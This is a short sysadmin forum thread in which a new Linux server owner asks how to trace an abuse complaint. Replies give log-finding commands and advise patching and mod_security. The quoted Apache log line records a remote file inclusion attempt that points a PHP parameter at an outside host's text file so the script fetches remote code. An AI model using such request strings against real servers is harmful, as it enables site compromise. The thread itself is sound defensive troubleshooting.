newbie log checking question
 

What logs, or how do I check, to see who or what domain caused this:

[21/Aug/2007:00:29:23 +0000] "GET /viewforum.php?f=10//lib.inc.php?pm_path=http: //
marketingpower.ifrance.com
>> /.
>> z.txt?? HTTP/1.1" 403 487 "-" "libwww-perl/5.808"
>> (malwarecomplaints.info)
>> "-"

thanks

Where did you get that from, if I'm not too indiscrete?

Don't think this is a 'security forum post' but a lot depends on how your apache log's are setup which you could see in your httpd.conf file. If they are setup normally, you could do it a number of way's such as a;
cat /var/log/httpd/* |grep viewforum.php?f=10

That will give you all the places that part appears as well as what file, so try that, and report back,

An abuse complaint filed against my server.

That directory (var/log/httpd) is empty.

Just to add, in the hope of mercy from all here, that prior to getting into linux servers recently I was quite a Windows guru, but I am seeing the light . . . . .

Locate your webservers config. Default name for Apache is "httpd.conf". Grep that file: 'grep -i '^[a-z].*log/*/' httpd.conf'. If that doesn't yield anything then it may be configured to log in some subdir of what is configured with the "ServerRoot" directive in "httpd.conf". If nothing works another way could be to find the PID of the webserver running: 'pgrep -l -f /httpd', then list the files it has open for writing: 'lsof -w -n -p INSERTPIDONEHERE -a -d w,0-10'. Hopefully you'll see something called "access_log" or similar.

Next time please put loglines between BB code tags for enhanced readability. If I'm looking at that (malformed) logline I'm thinking this is one of those inclusion tricks. Make inventory of what applications your webserver actually serves (besides that forum), check each for updates and install those or uninstall the application. Also look at mod_security.

Thanks, got it! And thanks for the patience.